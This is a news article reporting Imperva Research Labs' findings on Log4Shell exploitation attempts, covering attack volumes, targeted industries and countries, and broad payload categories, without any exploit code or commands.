Log4Shell zero day vulnerability most significant security threat of past decade
The Log4Shell zero day vulnerability is truly one of the most significant security threats of the past decade and its effects will be felt far into 2022 and beyond, according to Imperva Research Labs.
Imperva has released its analysis of recent Log4j related vulnerabilities including attack patterns, payloads and bypass techniques.
The company observed more than 102 million exploitation attempts since the disclosure on December 9. In the first 10 days, Imperva observed almost 1.3 million exploit attempts per hour. Since the peak on December 23, there has been a general decline in the number of exploit attempts.
According to the research, commonly targeted industries are financial services (29.6%), food and beverages (12.4%) and computing and IT (10.4%). Attackers largely used a “spray and pray” approach to the exploitation of this vulnerability. Imperva says it did not detect a strong correlation between the top sites attacked in each category and their technology stack, however, the correlation becomes more observable when considering only malicious remote code execution (RCE) payloads that appear to be more targeted.
More than100 different types of web clients have been targeted. The most prevalent of these clients was the Go HTTP library, with more than 10 million requests and counting. The combination of the volume of the attacks and the distribution of web clients suggests that attacks were quickly automated and that attack tools were created to make it easier for attackers to reach as many targets as possible.
Imperva observed attacks targeting sites in over 160 different countries. The US saw the majority of exploit attempts (46.5%), but Australia is in the top 6 at 3.5%. New Zealand ranked 11th at 1.5%.
Key points from the research include:
Attack Patterns: Attackers largely used a "spray and pray" approach to the exploitation of this vulnerability. Many IPs were using a common technique known as "fuzzing" to identify vulnerable Java web applications.
Payload Analysis: Imperva witnessed many different payloads used in the exploitation of Log4Shell. It has divided the payloads into five categories: Probing, Reverse shells, Malware deployments, Data exfiltration and Patching.
Social Media: When you drop a zero-day vulnerability on social media, it spreads like wildfire, Imperva says. Twitter mentions of key terms relating to the exploit skyrocketed – the company monitored several Log4j-related keywords over the first week of the incident – the term “Log4j” had just two mentions on December 8, followed by a few more on December 9. Then suddenly, there were thousands of mentions starting on December 10.
Future Outlook: Imperva predicts that a tidal wave of breaches will be reported in the next year stemming from this vulnerability and will impact organisations of all sizes. It predicts a sharp increase in ransomware attacks and exploitative crypto mining activity. Botnets will use this vulnerability to expand, hence the volume of application and network DDoS attacks will increase.